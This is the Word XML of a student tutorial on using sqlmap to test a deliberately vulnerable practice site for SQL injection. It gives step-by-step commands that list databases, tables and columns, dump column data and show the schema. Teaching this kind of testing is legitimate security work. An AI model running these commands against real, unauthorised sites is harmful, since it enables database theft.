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DC6B5" w14:textId="2B1325CF" w:rsidR="00BA419D" w:rsidRPr="00302A70" w:rsidRDefault="00302A70">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302A70">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL INJECTION VULNERABILITY USING </w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00302A70">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>To</w:t>
      </w:r>
      <w:r w:rsidR="007D54B0" w:rsidRPr="00302A70">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ol</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00302A70">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00000000" w:rsidRPr="00302A70">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11ACF8FB" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00BA419D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D865E3" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">By: </w:t>
      </w:r>
      <w:r w:rsidR="007D54B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Vanshika Bansal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>20BCY100</w:t>
      </w:r>
      <w:r w:rsidR="007D54B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC991DB" w14:textId="77777777" w:rsidR="007D54B0" w:rsidRDefault="007D54B0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42ED309C" w14:textId="77777777" w:rsidR="007D54B0" w:rsidRPr="007D54B0" w:rsidRDefault="007D54B0" w:rsidP="007D54B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D54B0">
        <w:t>In this tutorial, it is explained how to test whether a website is safe from SQL injection using the SQLMAP penetration testing tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206EB767" w14:textId="77777777" w:rsidR="007D54B0" w:rsidRDefault="007D54B0" w:rsidP="007D54B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D54B0">
        <w:t>SQL Injection is a code injection technique where an attacker executes malicious SQL queries that control a web application’s database. With the right set of queries, a user can gain access to information stored in databases. SQLMAP tests whether a ‘GET’ parameter is vulnerable to SQL Injection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527E9F04" w14:textId="77777777" w:rsidR="007D54B0" w:rsidRPr="007D54B0" w:rsidRDefault="007D54B0" w:rsidP="007D54B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA749EC" w14:textId="77777777" w:rsidR="007D54B0" w:rsidRPr="007D54B0" w:rsidRDefault="007D54B0" w:rsidP="007D54B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D54B0">
        <w:t xml:space="preserve">If you observe a web URL that is of the form http://testphp.vulnweb.com/listproducts.php?cat=1, where the ‘GET’ parameter is in bold, then the website may be vulnerable to this mode of SQL injection, and an attacker may be able to gain access to information in the database. Furthermore, SQLMAP works when it is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D54B0">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D54B0">
        <w:t xml:space="preserve"> based. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CBCB09" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00BA419D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F38EC1D" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Step 1: We will check if the website is vulnerable to SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="007D54B0">
        <w:t xml:space="preserve"> by simply</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> put</w:t>
      </w:r>
      <w:r w:rsidR="007D54B0">
        <w:t>ting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> * in the GET method to check this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C6F830" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00BA419D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2C39C1" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="4670023E" wp14:editId="5212E4A8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6332220" cy="41382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332220" cy="4138295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B085BE" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2: Install </w:t>
      </w:r>
      <w:r w:rsidR="00B27466">
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:t>map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1307A1C4" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00BA419D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D5AA94" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="3" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="39DADC98" wp14:editId="1C4D8BB6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4808220" cy="134112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4808220" cy="1341120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>In this case the tool is pre-installed in Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFDC974" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00BA419D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C26513D" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r w:rsidR="00B27466">
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:t>map Help Menu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250772CB" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00BA419D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29CBA339" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="4" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="65F58C72" wp14:editId="1819EE9F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6332220" cy="382333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6332220" cy="3823335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This is the help page of </w:t>
      </w:r>
      <w:r w:rsidR="00B27466">
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:t>map which contains all the commands. For this demonstration</w:t>
      </w:r>
      <w:r w:rsidR="00B27466">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we will only perform enumeration using </w:t>
      </w:r>
      <w:r w:rsidR="00B27466">
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:t>map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04419482" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00BA419D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62EAE7B0" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4: Get databases of a website: sqlmap </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink>
        <w:r>
          <w:t xml:space="preserve"> –dbs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68C72812" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="5" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="35E4113F" wp14:editId="09765C4E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2674620" cy="69342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674620" cy="693420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Here we can see we have two databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B593246" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00BA419D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67EA8B4F" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 5: Getting tables in a database: sqlmap </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink>
        <w:r>
          <w:t xml:space="preserve"> –D </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:t>acuart</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:t xml:space="preserve"> –tables</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2BEF3469" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00BA419D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12BA6A67" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="6" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="1CBFDB94" wp14:editId="07577BEF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2308860</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1714500" cy="259080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1714500" cy="2590800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Step 6: We can see the columns present in a particular table: sqlmap </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink>
        <w:r>
          <w:t xml:space="preserve"> –D </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:t>acuart</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:t xml:space="preserve"> -T artists –columns</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1490A51F" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00BA419D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C1B567B" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="7" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="423A3805" wp14:editId="4E83FA7F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2743200" cy="213360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2743200" cy="2133600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Step 7: We can also dump all data from a column: sqlmap </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> –D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -T artists –C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD1535A" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00BA419D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C774CAE" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="8" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="382DBC72" wp14:editId="4DA320E1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1714500" cy="214122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1714500" cy="2141220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Following is the data in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C596C3" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00BA419D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="323591E1" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 8: Finally we will see the complete database schema of the database: sqlmap </w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> –schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2A32D0" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="9" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="06312BD0" wp14:editId="276A7666">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3390900" cy="289560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3390900" cy="2895600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EC39BF" w14:textId="77777777" w:rsidR="00BA419D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="10" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="3A4CE47F" wp14:editId="32E6B3E1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>998220</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4335780" cy="503682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335780" cy="5036820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00BA419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19D"/>
    <w:rsid w:val="00302A70"/>
    <w:rsid w:val="007D54B0"/>
    <w:rsid w:val="00B27466"/>
    <w:rsid w:val="00BA41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EE777"/>
  <w15:docId w15:val="{BB88B0B3-F682-4E29-8AFD-33F413A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Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="007D54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testphp.vulnweb.com/listproducts.php?cat=1"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testphp.vulnweb.com/listproducts.php?cat=1"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testphp.vulnweb.com/listproducts.php?cat=1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=1"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testphp.vulnweb.com/listproducts.php?cat=1"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 Bansal</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>Vanshika Bansal</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-19T04:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-03T07:27:00Z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84d64feadfa7dfb1202fb80317a3b7fd4c80b70b9a897bc6d3c4f01081214737</vt:lpwstr>
  </property>
</Properties>
</file>